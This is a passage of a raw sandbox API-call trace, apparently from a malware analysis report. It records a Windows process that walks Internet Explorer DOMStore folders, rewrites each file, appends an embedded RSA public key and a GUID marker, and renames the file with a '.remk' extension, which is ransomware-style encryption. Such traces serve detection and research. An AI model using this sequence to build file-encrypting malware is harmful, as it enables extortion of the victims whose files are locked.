dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb70 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcbb8 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb58 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb28 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf720 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0238.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0238.087] WriteFile (in: hFile=0x640, lpBuffer=0x3adfb24*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x3adfb24*, lpNumberOfBytesWritten=0x3adfb14*=0x8, lpOverlapped=0x0) returned 1 [0238.087] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.087] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0238.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0238.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0238.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0238.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0238.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0238.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0238.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0238.087] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0238.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.088] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.088] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0238.088] CloseHandle (hObject=0x640) returned 1 [0238.091] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.remk")) returned 1 [0238.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0238.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0238.092] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 0 [0238.094] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.094] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.094] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\") returned="UV0DUWVB\\" [0238.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0238.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0238.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0238.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.095] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.095] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.095] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.095] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.095] PathFindFileNameW (pszPath="") returned="" [0238.095] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.096] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.097] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.097] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\") returned="VGMTOI09\\" [0238.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0238.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0238.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0238.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.097] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.097] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.097] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.097] PathFindFileNameW (pszPath="") returned="" [0238.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.098] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.098] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 1 [0238.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned=".xml" [0238.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0238.099] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=836) returned 1 [0238.099] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0238.102] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x31e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.102] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0238.105] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x344, lpOverlapped=0x0) returned 1 [0238.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.105] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0238.106] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0238.106] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0238.106] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0238.106] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0238.106] GetLastError () returned 0x0 [0238.106] CryptDestroyHash (hHash=0x31de170) returned 1 [0238.106] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0238.107] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0238.107] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0238.107] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0238.107] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0238.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5d78 [0238.107] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x344, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.107] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0238.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0238.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0238.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0238.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0238.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0238.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0238.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0238.108] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0238.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.108] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.108] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0238.108] CloseHandle (hObject=0x640) returned 1 [0238.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x37ba508 [0238.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8f0) returned 0x37bd408 [0238.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba508 | out: hHeap=0x630000) returned 1 [0238.110] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.remk")) returned 1 [0238.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0238.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0238.111] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0238.113] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 0 [0238.113] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0238.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0238.114] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6960 [0238.114] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.114] HeapFree 